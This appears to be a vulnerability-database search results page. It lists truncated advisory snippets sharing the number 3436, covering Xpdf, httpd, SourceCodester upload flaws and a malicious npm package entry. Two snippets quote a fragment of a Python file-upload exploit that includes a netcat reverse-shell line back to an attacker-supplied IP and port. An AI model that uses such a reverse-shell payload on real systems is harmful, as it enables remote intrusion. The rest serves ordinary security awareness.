@squawk/mcp (>=0.2.0 <=0.9.0) potentially affected by unknown CVE via @squawk/airports (>=0.3.2 <=0.6.1)

@squawk/airports NPM version =0.3.2, =0.2.0, =0.9.0 Source cves: unknown CVE Source advisory: OSV:MAL-2026-3436...

EUVD-2026-3436

IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information from allocated memory due to improper clearing of heap memory...

EUVD-2019-3436

Malware in sbrugna...

CVE-2022-3436

A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack can be launche...

CVE-2025-3436

creationtimestamp| type| source ---|---|--- 2025-04-08 08:46:44+00:00| seen| https://t.me/DarkWebInformerCVEAlerts/10882 2025-04-08 13:59:44+00:00| seen| https://t.me/cvedetector/22438...

GLSA-202409-25 : Xpdf: Multiple Vulnerabilities

The remote host is affected by the vulnerability described in GLSA-202409-25 Xpdf: Multiple Vulnerabilities Multiple vulnerabilities have been discovered in Xpdf. Please review the CVE identifiers referenced below for details. Tenable has extracted the preceding description block directly from th...

CGA-39P2-3436-J283

Bulletin has no description...

CVE-2024-3436

A vulnerability was found in SourceCodester Prison Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /Admin/edit-photo.php of the component Avatar Handler. The manipulation of the argument avatar leads to unrestricted upload. The attack c...

Slackware: Security Advisory (SSA:2024-040-01)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Mageia: Security Advisory (MGASA-2024-0035)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

Online Student Clearance System 1.0 Shell Upload

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

Oracle Linux 8 : httpd:2.4 (ELSA-2019-3436)

The remote Oracle Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2019-3436 advisory. - In Apache HTTP Server 2.4 release 2.4.38 and prior, a race condition in modauthdigest when running in a threaded server could allow a user with valid...

CVE-2023-3436

creationtimestamp| type| source ---|---|--- 2023-06-28 00:12:16+00:00| seen| https://t.me/cibsecurity/65589...

CVE-2023-3436

Xpdf 4.04 will deadlock on a PDF object stream whose "Length" field is itself in another object stream...

CVE-2023-3436

CVE-2023-3436 affects Xpdf 4.04 where a PDF object stream’s Length field, if placed in another object stream, can cause a deadlock. Public sources (Slackware/Mageia advisories) recommend upgrading to Xpdf 4.05 or newer to fix the issue, with related entries noting other CVEs in the same release. ...

CVE-2023-3436 Deadlock in Xpdf 4.04 due to PDF object stream references

Xpdf 4.04 will deadlock on a PDF object stream whose "Length" field is itself in another object stream...

RHEL 8 : kpatch-patch (RHSA-2021:3436)

The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2021:3436 advisory. This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Security Fixe...

SUSE CVE-2012-3436

OpenTTD 0.6.0 through 1.2.1 does not properly validate requests to clear a water tile, which allows remote attackers to cause a denial of service NULL pointer dereference and server crash via a certain sequence of steps related to "the water/coast aspect of tiles which also have railtracks on one...

CVE-2022-3436 SourceCodester Web-Based Student Clearance System Photo edit-photo.php unrestricted upload

A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack can be launche...